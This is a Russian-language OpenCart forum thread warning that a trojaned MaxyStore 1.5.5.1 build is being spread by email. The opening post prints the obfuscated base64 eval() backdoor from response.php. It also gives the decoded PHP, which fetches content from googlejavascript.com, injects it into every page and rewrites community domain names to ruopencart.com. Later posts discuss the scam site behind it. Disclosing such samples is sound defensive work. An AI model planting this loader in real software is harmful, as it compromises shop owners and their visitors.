Внимание! 26.01.2014 Ведется рассылка с вредоносной модификации OpenCart (MaxyStore 1.5.5.1)

[halfhope]

Письмо следующего содержания:

 

Доброго времени, дорогой пользователь halfhope![/size]

Теперь ты можешь скачать бесплатно релиз maxystore v1.5.5.1 по ссылке:[/size]

http://cenzoRED/reliz/maxystore_v1.5.5.1.zip

Поддержать автора можно купив сборку по ссылке:[/size]

http://cenzoRED/shop/maxystore/maxystore-relize/reliz-maxystore-1551.html

 

В этой сборке файл "system/library/response.php" содержит закодированный base64 код:

 

eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RhV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMlJoVjBad2IxbHJUbTloVm14WlZHMTRUMkZzU20xWGEyUlhZVzFKZVZWdGVFeFJNbEpvV1cxNFlVMVdaRlZVYkU1cVVqQnNOVlJyWkd0WlZURnpWMWhrV0ZKRk5VUlpWVnAyWlZaYVdFOVZkRlJTYkc4eFYxZDBUMk13TkhkVWJrSlNWakpTUzFWVVFrZGliRTVXVkd0S1lVMUlRa2xWYlRBeFdWWmFObFpZWkZSV1ZrWXpWMnBDZG1Rd01WbFhiWGhwVmpOb05sZFhkR3RTYlZKeVRsWlNUMU5IVWt0VlZFcHZWREZrVjFwRk9XcFNNSEF4VmxjMVlXRnJNWFJaZWs1VVZsWndWMVJxUW5OU2JVcEpWbTEwVTAxV2NEWlZNVlpXWlVkR1IySkVWbEppUlVwWFdsWldTMWRzVGxaVmExcHJUVWhvZUZac1VtdFRiRTVHWWpOb1ZVMHllRVJhVm1SVFkxZEplbUZGTVdoaVdGRjRWa1prY2sxRk5WWmtSbEpTWVRKb2FGWnFRVEZsVm14MVlYcFNiRlpVUmtaVmJHaHJWR3hLU0ZwRVZsVmhNRFZFVldwS1IxZFdUblJsUjBacFZrZHpkMVpGYUhkVWJWSldUbGhDVDFKR1dreGFWelZQVkVaT1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JrcFlWa1Z3ZFZReFduSmxiRnAxWWtkc1UyRnRlRE5YVnpCNFl6QXhSbVJGVW1obGJWSkZXVlpXUjJKc1RsWlVhMHBoVFVkNFJWVldaR3RYYXpCNFYycFdXbUV4YXpGYVYzaDNWMVpXZFZkdGNGUlNhMXAxVlhwQ1QxVXlSblJTYTFKclRXMVNVMVJXV21GV1JscEdWbFJXVmxac2NFaFVNVnBoVm0xRmVscEljRlJoTW1oWVdsWmtTMUpHUmxsUmJFSnJUV3BzZFZVeFZrOVJiRzkzWWtWU1VsWXlVa3RWYWtFd1pVWnJlVTFVVW1GaVZURTFWbTF3UTJGVk1IZFRXR1JVVFVVMVZGbFhNVWRTUjFGNVdrWktUbFpzY0ZWV2ExWldUbFpXVjFkclpGQldiSEJYVkZWYVlWWkdWbGRXYlhSVFlrWktlbFpXYUU5VGJFVjRVMjA1V0dGcmNGaGFSbVJUVWtkR05scEZVbWhXVlZwMVZURldUMUZzYjNkaVJWSlNWakpTWVZSVVJtRk9WbXh5VjFSV2JHSklRbHBXVnpWaFlXeE9SMUp0TlZSTlJUVlVXVmN4UjFKSFVYbGFSa3BPVm14d1ZWWnJWbFpPVmxaWFYydGtVRlpyTlZSV2JYaExWakZhV0dONlJsZFdiRnA1Vlcxek5WWnJNVWRqUldSWFZqSjNlbGRxUVhoV1IwWTJXa1ZTYUZaVlduVlZNVlpQVVd4dmQySkZVbEpXTWxKaFZGUkdZVTVXYkhKWFZGWnNZa2hDV2xaWE5XRmhiRTVIVW0wMVZFMUZOVlJaVnpGSFVrZFdSbFZzWkZkaE0wSlBWbXRTUjFFeFdsZGFNMmhZWVRGd1YxbFVRbmRWVmxwVlVXeGFhazFZUWpCVmJUVlBZV3N4YzFadVpGVk5NbEl5VjJwQ2MxSkdSbGhhUlhCU1RVVmFkVlV4Vm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwYVJ6VldWa1ZhV0ZaVVJsTlNhemxYVW14a1UyRnRlRmRXVkVaV1pVWktjMVZZYUZkaVJscE9WVlJDUm1WR1RYaFZibkJVVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWlZFcFBVMFpLZEU1WFJsZFNSVnA0VjJ0YWIxTXlUWGhhTTJ4WFlXeEthRlpxUVhoa2JFNXlXa1U1YVUxSVVsWlpla0l3VWtaVmVGTnVUbHBOYWxaTVdrY3hUMlJXUm5SaFIwWk9Za1phZFZaVldrOVJiVXB6VVd0U1VGWXllSEJVVjNoS1RWWldTR05FVG10aVZWcEtWbGMxVTJGV1NrVlZibFpWVFRKU01sZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBWVEpKZVZWcmJGWmliVkpoVkZkd2MyTnNaSE5VYTBwUVZsZDRTVlpIY0VkaGJVcFpZVWN4V0dGcmNGaFVWV1JIVjBVMVdFMVhiR3hXTWxKNVZqRlNTMkp0VFhkaVJWcFZZa1p3VjFsVVRtOVRNVnBJWkVkR1ZsSnRaRE5aVlZwWFZqRktjbE50TVZaV1JVVXhWV3hhUzFaSFJqWmFSVkpvVmxWYWRWVXhWazlSYkc5M1lrVlNVbFl5VW1GVVZFWmhUbFpzY2xkVVZtaGlWWEJKVkRGb2QxbFdWWGxhU0VwWVZrVndkVmt3VlRWTk1rbDVXa1Z3VWsxRlduVlZNVlpQVVd4dmQySkZiRlZoYXpWdlZqQmFTMk5XYkZaVWJUVm9UV3RhU2xaWGNFTmhiRWwzVGxSS1dHRXlVbGRaTUdSWFRUSkplVnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkU1V1ZHdEtZVTFYZERWVmJUVjNXVlpWZDFKdVZsVldNMEpEV2tSQ2QwNXRTWGRrUlhCU1RVVmFkVlV4Vms5UmJHOTNZa1ZTVWxZeVVrdFZWRUpIWW14T1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JUVlVWbFUxUTFkcVNrOWtSbHB4VVcxMFdGSllRWGhWTVZaUFZUSlJlR0pHYUdGU00yaFJXa1JKTldKc1RsWlVhMHBoVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWGFrSnpVa1pHV0ZwR2NHbGhNMEo2VmpGYWEyVnJOSGRVYmtKU1ZqSlNTMVZVUWtkaWJFNVdWR3RLWVUxSGVFVlZWbVJyVTJ4RmQxSnROVlJXVlRWRVdWZDRjMWRXVW5SbFJYQlNUV3N4TTFaR1ZsTlZiVXB5VDFST2FVMXRVa3RWVkVKSFlteE9WbFJyU21GTlIzaEZWVlprYTFOc1JYZFNiVFZVVmxVMVExZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBVVEpXVjJOR2JGWmhhMXB4V1d4U1UySnNUbkphUm1Sc1ZqQTFNRlF4YUhOaGJFbDNWMjVXV0dKR1NqWlZla0p6VWtaR1dGcEZjRkpOUlZwMVZURldUMUZzYjNkaVJWSlNWakpTUzFWVVFrZGliRTVXV2tWMGJGWnVRbGxWYlRWTFZVZFJlVTlWZEZKTlYxSlFXVlZrVG1WV1dsaGFSWFJzWWtaWmVsWkdaSE5oYXpSM1ZHNUNVbFl5VWt0VlZFSkhZbXhPVmxSclNtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlZNVlp2VXpKS1NGVnJiRmRpYlhod1dWWldSMk5zWkhOaFJYUnNWakJzTmxVeU5XdFhiRmw1Vlc1T1ZVMHlVakpYYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkdSWVRsVjBhVkp0ZUZsWk0zQnJVa2RHVmxKdE5WUldWVFZEVjJwQ2MxSkdSbGhhUnpGV1YwVkZNVlZVU210a01rNUhZMGhDVWxaNmJFeFZha1oyWkRGa2MxbDZSbWhOUjNoR1ZGVmthMWxWTVhOWFdHUllVa1UxUkZsVlduWmxWbHBZVDFWd2FWWXlaRE5YYTFadlVXczFjbVZFVmxCV2VsWndWRmR3YzJSV2JISmFSbVJxVm0xNFdsWXlNVzloYXpGeVRsUldXbFp0YUVSVVZWWTBaRVpTZFZkdGJGWmxiWGgyVjFSQ2EyTnRVbGhVYTJob1UwZFNVbFJVUVRGak1XdDVUbGRHYVZJd05YaFVWV1J6VkZkR1YxTnRNVmRXUlVwWVZsUkdZV05zV25OVWJHaHNWakZLVmxaWGVHRlRNVmw0VTJ4a1ZHSldjRlpaVkVKaFZERldjMVJ0ZEdGU1dHaDNWVEZqZUdGc1NYZFhibFpZWWtaR00xbFdWalJqUmxaMFYyeGFUbEpzY0ZWV2JURXdWakZWZUZwRVZtRlNhelZVVm0xMFlWWXhWbk5YYXpsWFZtMWtORlp0ZUU5V1JsVjVWVzEwVkUxVk5YcFVha0pQWTBaV2RFMVhhRmRsYkZwNVZURldVbVF4YjNoaVJteFVZbTE0WVZZd1pEQmtiRTVZWTBST2EySkhlREJVTVdRd1lrWmFSVlZ1UWxWU1ZUVkRXVlphUTFKRk9WaFBWM1JUWld0YU5sWlZaSE5UYlUxM1lrVlNWR0pzY0hGVmFrWmhUVlprVlZOclpHeFdNVXBGVkd4a2QyRlZNWEZSYmtKVlVsVTFRMWxXWkV0WFJrcHhWVzE0YVZaSGQzaFdSV014VXpBeFZtSklRbXROYlZKTFdXeFNSazFXYkhGVWEwNXBVakJ3TUZaSE1XOWhiVXB6VW1wR1drMXFWbGRaVmxZMFVrWkdXR0pIYkU1TlJYQjZWMWN3ZUZReVJraFVibFpXWWxSR2NGUlVRblpsUm14elZGUkdiRll4U2xWVk1XaFBVMnhGZDJORVNscE5SMUpZV2taYWNtVldTblZpUjNSU1pXeFpNVmRyV2s5VGJVMTNZa1ZTVkdKc2NIRlZha1poVFZaa1ZWTnJaR3hXTVVwRlZHeGtjMkpHVlhkaVNHUlZUVEpTTWxsVVNrOWtSbHAxV2tkc1UwMUdjSGhXTW5oUFVXczVWbUpGYUZOaWJYaHhXV3hXV2sxV1RYZFVhM0JvVmxob1JWVldaREJaVjBwelUyNU9XbUpVUmxOWmVrSnpVa1pPZFdKSGRGZGxiWGQ2VmpKNGFrMVhSbk5pUm14VVlXdEtUbGxzVlRGTmJHeHpWR3R3YWsxSGVFVlZNalZ6WVRGYU5tSkVUbGhpUjAxNFdWZDRjMWRXVG5GUmF6RnBWbFJWZVZkWGVFOVRiVTEzWWtWU1ZHSnRlSEpXYm5CelRURmtjMWw2Um1oaVIzaGFWVEp3UTFSWFNsWk9WRXBhWWtVMVMxbDZRbk5TUms1MVlrZDBWMlZ0ZDNwV01uaHFUVmRHYzJKR2JGUmhhMHBPV1d4Vk1VMXNiSE5VYTNCcVRVZDRSVlV5TlhOaE1WbzJZa1JPV0dKSFRYaFpWM2h6VjFaT2NWRnJNV2xXVkZWNVYxZDRUMU50VFhkaVJWSlVZbTE0Y2xadWNITk5NV1J6V1hwR2FHSkhlRnBWTW5CRFZGZEtWazVVU2xwaVJUVkxXVEJWTlUweVNYbGtSMnhPVFZadmVsZHJXbTlWYkc5NFVXeFNVbUp1UW5KVk1GWjNZbFpyZVUxV1pHdE5hM0JKVlcweGQxbFdWWGxhU0VwWVlsUkdlbHBHV25kU1IxRjVXa1YwVkZKWVFucFhWRUpyVGtkR1IyRXpiRmRYUlRWTFZWUkdTMDFzY0VkaFJVNU9WakZLUlZsWWNHdFNSMHBZWlVSR1dsWnNhekZhVjNoM1YxWldXRTlWY0dsV2EzQXpWMWh3VDFFeVRYaGlSbXhwVWpGd2FGWXdWbmRPVm14eFZHdDBiR0V5ZUhkYVJFcHpZVlV4YzJOSVVsUldNbmg1VkdwQ1QyUkdXblZpUjNCcFZrZDNNVll3VWs5VE1rcElWR3RvVUZkSGVISlZha28wVFZaa2RXSkhOV3ROU0ZKV1dYcENNRmxXV1hkT1dGcGFZbTE0UTFsVVNrcGxiRnAxV2tkMFdGSnJWWHBYYlhoSFpESktTRk5yYkZWaVdHaExWVEJvVDFSR1pITmFSVGxwVFd0dk1WVldaREJoVlRCNFYycE9ZVkp0YUZOVWFrSlBaRlV4UlUxSE5VeFZNbk16VVRKak9WQlRZM0JMVkhOTEp5a3BPd289JykpOwo='));

 

Код не видно если в редакторе кода, которым Вы пользуетесь, текст выходит за рамки окна (WordWrap). 

После декодирования кода получаем:

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
$errorpage = '</body></html>';
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return $errorpage;
                break;
case '502';
                        return $errorpage;
                break;
        }
}

if ($ftend = get_page("http://googlejavascript.com/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}

Просьба быть бдительным. Змінено 13 березня 2014 користувачем afwollis
cenzoRED

[deim]

$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);

Ахаха :mrgreen:

Особенно помня о том, что такое "=^_^=.ru" и откуда оно берётся, то код вообще убойный

Ведь у нас этим смайлом заменяются все упоминания сами-знаете-чьего-сайта

[halfhope]

$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);

Ахаха :mrgreen:

Особенно помня о том, что такое "= ^_^=.ru" и откуда оно берётся, то код вообще убойный

Ведь у нас этим смайлом заменяются все упоминания сами-знаете-чьего-сайта

 

 

а я не знаю  :(

[underline]

Гений маскировки :)

 

 

[deim]

а я не знаю  :(

Речь о той самой сборке, которую предлагают скачать. Адрес его сайта у нас всегда менялся на смайлик

А вообще у меня подозрения, что это не вредоносный код, а кое-чьи проделки :)

[Baco]

Данная рассылка не имеет ничего общего с максистор, если внимательно просмотреть на код, то видно что:

1. "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by"

заменяются на ruopencart.com, просто использовали псевдоним и возможность "насолить".

[shoputils]

Baco, врядли с целью насолить, скорее готовится к открытию очередной нехороший ресурс, который будет похож на один известный фейковый. Не удивлюсь, если у них один и тот же владелец.

[Baco]

Baco, врядли с целью насолить, скорее готовится к открытию очередной нехороший ресурс, который будет похож на один известный фейковый. Не удивлюсь, если у них один и тот же владелец.

Согласен с Вашим мнением полностью, просто акцент ответа хотел сделать, что с максистор - не имеет ничего общего эта рассылка, кроме как второй сноски в письме, с линком на продажу самой сборки.

Так же, предполагаю, что открывается новый варезник где вскоре увидим коммерческие скрипты не только с этого форума.

Что и требовалось доказать:

[ocdev_pro]

Сколько раз сталкивался с этой говно-сброкой, постоянно проблемы! У автора просто руки из пятой точки растут. 

[newbie2013]

Да уж сборка то ещё говно, но пару-другую хороших вещиц я оттуда выдрал для себя)

[Avalium]

Всем привет!

Сайту ruopencart.com вообще можно доверять? Может кто регистрировался уже...

Они декларируют, что после регистрации (с получением ключа за 100 рублей или около того) станут доступны все модули для скачки. Есть сомнения на этот счет...

[riny]

...

это варез, где незаконно продают ворованные модули с вшитой вирусней. и уж тем-более никакой поддержки там не оказывают.

[Avalium]

это варез, где незаконно продают ворованные модули с вшитой вирусней. и уж тем-более никакой поддержки там не оказывают.

 

Спасибо за информацию...

[bezzubtsev]

Пусть сюда приходят по поиску "Ключ регистрации ruopencart.com" и "Платное вступление в клуб RuOpencart"

Конечно, это выбор каждого, бросать им копейку и скачивать модули, которые они там опубликовали. Но это себе дороже.

Во-первых, часто сталкивался, что нужна поддержка по модулям от разработчиков (а там их нет).

Во-вторых, лазать и перепроверять весь код, и вычищать все дерьмо из него - это тоже работа. А если вы плохо разбираетесь в коде - то и найти ничего не сможете.

Дурная репутация у владельцев сайта, что уж тут поделаешь.

[vimpel77]

я отправил по глупости 3 бакса, кода не дождался, саппорт молчит.

Надо, что бы под запросом "ruopencart.com" и эта темка всплывала. Лохотрон